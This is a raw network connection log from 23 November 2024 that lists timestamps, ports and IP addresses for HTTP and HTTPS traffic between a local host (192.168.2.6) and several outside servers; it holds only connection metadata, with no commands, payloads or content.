Nov 23, 2024 07:09:15.034905910 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:15.034985065 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:15.103607893 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:15.144653082 CET	443	49715	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:15.144753933 CET	443	49715	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:15.144952059 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:15.145597935 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:15.145627022 CET	443	49715	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:15.145658016 CET	49715	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:15.223346949 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:15.420907974 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:15.420942068 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:15.421015978 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:15.421915054 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:15.421962023 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:15.422096968 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:15.422420979 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:15.422452927 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:15.422499895 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:15.426017046 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:15.426032066 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:15.426193953 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:15.426208973 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:15.426361084 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:15.426373005 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:15.554563999 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:15.554629087 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:15.555835962 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:15.627938032 CET	443	49716	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:15.628072023 CET	443	49716	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:15.628382921 CET	49716	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:15.628485918 CET	443	49716	20.198.118.190	192.168.2.6
Nov 23, 2024 07:09:15.628525019 CET	49716	443	192.168.2.6	20.198.118.190
Nov 23, 2024 07:09:15.675407887 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:15.996042013 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:15.996126890 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:15.996151924 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:15.996196032 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:15.997633934 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:16.032291889 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:16.032381058 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:16.032630920 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:16.032979965 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:16.033015013 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:16.117115974 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:16.437462091 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:16.437480927 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:16.437508106 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:16.437524080 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:16.437537909 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:16.437545061 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:16.437561035 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:16.437562943 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:16.437596083 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:16.437607050 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:16.439292908 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:16.558782101 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:16.878060102 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:16.878123045 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:16.895267963 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:16.895348072 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:17.015774965 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:17.015789986 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:17.015808105 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:17.015816927 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:17.015878916 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:17.015887976 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:17.177820921 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.177932978 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.206825972 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.206850052 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.207763910 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.207840919 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.220803022 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.220887899 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.234643936 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.234736919 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.236852884 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.236865044 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.237149954 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.237162113 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.237673998 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.237744093 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.302655935 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.302726984 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.305964947 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.305983067 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.306227922 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.306397915 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.306417942 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.306427002 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.739013910 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.739150047 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.739248991 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.739273071 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.739386082 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.739398003 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.739475965 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.739480019 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.739567995 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.749866009 CET	49719	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.749908924 CET	443	49719	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.770981073 CET	49673	443	192.168.2.6	173.222.162.64
Nov 23, 2024 07:09:17.770988941 CET	49674	443	192.168.2.6	173.222.162.64
Nov 23, 2024 07:09:17.822453976 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:17.822539091 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:17.830355883 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.830385923 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.830403090 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.830459118 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.830490112 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.830503941 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.830535889 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.840158939 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.840183973 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.840254068 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.840282917 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.841284990 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.844614029 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.844672918 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:17.844743967 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:17.924010038 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:17.924051046 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:17.924519062 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:17.966134071 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:17.969053030 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:17.989765882 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.001570940 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:18.001651049 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:18.001671076 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:18.001679897 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:18.001718044 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:18.011924982 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.059375048 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.067657948 CET	49720	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:18.067702055 CET	443	49720	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:18.068625927 CET	49718	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:18.068660021 CET	443	49718	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:18.083498955 CET	49672	443	192.168.2.6	173.222.162.64
Nov 23, 2024 07:09:18.334115028 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.383635044 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.383670092 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.383681059 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.383718967 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.383769989 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.383801937 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.383821964 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.383857012 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.383857012 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.383876085 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.383910894 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.383933067 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.453701019 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.574661970 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.574700117 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.574740887 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.574769020 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.574788094 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.574816942 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.618797064 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.618824959 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.618879080 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.618899107 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.618935108 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.618935108 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.752042055 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.752074003 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.752124071 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.752145052 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.752162933 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.752186060 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.771039963 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.771059990 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.771114111 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.773344994 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.773395061 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.773441076 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.773586988 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.781757116 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.781817913 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.781864882 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.781950951 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.782715082 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.782752991 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.782787085 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.782798052 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.782818079 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.782835007 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.790216923 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.790251970 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.790268898 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.790301085 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.798578978 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.798629999 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.798680067 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.798719883 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.803801060 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.803858042 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.803881884 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.803890944 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.803914070 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.803925037 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.806988001 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.807120085 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.807176113 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.822604895 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.822630882 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.822678089 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.822694063 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.822724104 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.822746992 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.896111012 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.896194935 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.896224022 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.896266937 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.900275946 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.900321960 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.901191950 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.901218891 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.901410103 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.909586906 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.909683943 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.909734011 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.918011904 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.918030024 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.918066025 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.918103933 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.926393986 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.926445961 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.946228027 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.946261883 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.946310043 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.946338892 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.946368933 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.946439028 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.961862087 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.961884975 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.961921930 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.961939096 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.961991072 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.961992025 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.962863922 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.962928057 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.962976933 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.963021040 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.967108011 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.967154980 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.968674898 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.968693972 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.968722105 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.968738079 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.977061987 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.977169991 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.977185011 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.977227926 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.977683067 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.977715969 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.978012085 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.978032112 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.978085995 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.985464096 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.985527992 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.985569954 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.985611916 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.991410017 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.991434097 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.991496086 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.991513014 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:18.991543055 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.991584063 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:18.993936062 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.993993044 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:18.994031906 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:18.994070053 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.002330065 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.002378941 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.002415895 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.002463102 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.007235050 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.007292986 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.007342100 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.007359028 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.007388115 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.007410049 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.009300947 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.009367943 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.009419918 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.010797024 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.010849953 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.018428087 CET	49721	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.018465042 CET	443	49721	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.021003962 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.021095991 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.021153927 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.024467945 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.024588108 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.024614096 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.024633884 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.031404018 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.031459093 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.031491995 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.031531096 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.038252115 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.038311005 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.038356066 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.038407087 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.045144081 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.045196056 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.045197964 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.045243025 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.066035986 CET	49722	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.066087961 CET	443	49722	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.066164970 CET	49722	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.071177006 CET	49723	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.071331024 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.071414948 CET	49723	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.072220087 CET	49724	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.072287083 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.072447062 CET	49722	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.072468996 CET	443	49722	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.072473049 CET	49724	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.072577953 CET	49724	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.072597980 CET	443	49724	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.073283911 CET	49725	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.073308945 CET	443	49725	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.073446035 CET	49725	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.073621035 CET	49723	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.073658943 CET	443	49723	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.073964119 CET	49725	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.073981047 CET	443	49725	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.074604034 CET	49726	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.074630022 CET	443	49726	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.074736118 CET	49726	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.074857950 CET	49726	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:19.074876070 CET	443	49726	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:19.088154078 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.088233948 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.088278055 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.088320017 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.091150999 CET	80	49717	185.215.113.206	192.168.2.6
